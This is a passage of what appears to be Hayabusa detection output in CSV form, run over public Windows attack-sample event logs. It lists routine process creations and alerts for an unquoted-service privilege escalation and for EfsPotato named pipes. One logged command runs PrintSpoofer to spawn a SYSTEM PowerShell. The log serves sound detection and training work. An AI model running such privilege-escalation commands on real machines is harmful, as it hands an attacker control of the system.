C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.487 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.600 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.603 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.158 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\Upfc.exe /launchtype boot /cv pVnjz5d3jkOKEwXZiJ9/ng.0 : Path: C:\Windows\System32\upfc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.536 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.540 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s SysMain : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.632 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.635 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\dxgiadaptercache.exe : Path: C:\Windows\System32\dxgiadaptercache.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.642 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.643 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.645 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.652 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.196 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.198 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.473 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.484 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.764 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.836 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetSvcs -p -s iphlpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.838 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.855 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:28.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k utcsvc -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:28.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:28.065 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:28.068 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s SstpSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:28.079 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe : Path: C:\Windows\System32\wlms\wlms.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:28.080 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,Rule: PrivEsc - Potential Unquoted Service Exploit : Command: c:\Program Files\vulnsvc\mmm.exe : Path: C:\program.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:28.086 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:28.096 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:28.465 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalService -p -s WdiServiceHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:32.050 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: sihost.exe : Path: C:\Windows\System32\sihost.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:32.058 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc : Path: C:\Windows\System32\svchost.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:32.097 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService : Path: C:\Windows\System32\svchost.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:32.358 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:35.125 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: MSEDGEWIN10\IEUser : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:35.236 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:37.209 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:40.692 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:40.712 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications : Path: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\RuntimeBroker.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:11.341 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:11.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6964 318 0000021FF2606500 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:11.516 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:16.073 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Discovery - domain time : Command: ""C:\BGinfo\BGINFO.EXE"" /accepteula /ic:\bginfo\bgconfig.bgi /timer:0 : Path: C:\BGinfo\BGINFO.EXE : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:16.165 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\SecurityHealthService.exe : Path: C:\Windows\System32\SecurityHealthService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:16.965 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe -Embedding : Path: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:18.975 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe"" /background : Path: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:21.251 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\regedit.exe"" : Path: C:\Windows\regedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:21.263 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6964 258 0000021FF266EC20 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:26.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\regedit.exe"" : Path: C:\Windows\regedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:21:08.564 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:21:18.412 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:21:19.340 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s WinRM : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:21:19.629 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-05-03 03:01:54.855 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: PrintSpoofer.exe -i -c powershell.exe : Path: C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx -2020-05-03 03:01:54.863 +09:00,MSEDGEWIN10,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx -2020-05-03 03:01:54.864 +09:00,MSEDGEWIN10,18,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx -2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: powershell.exe : 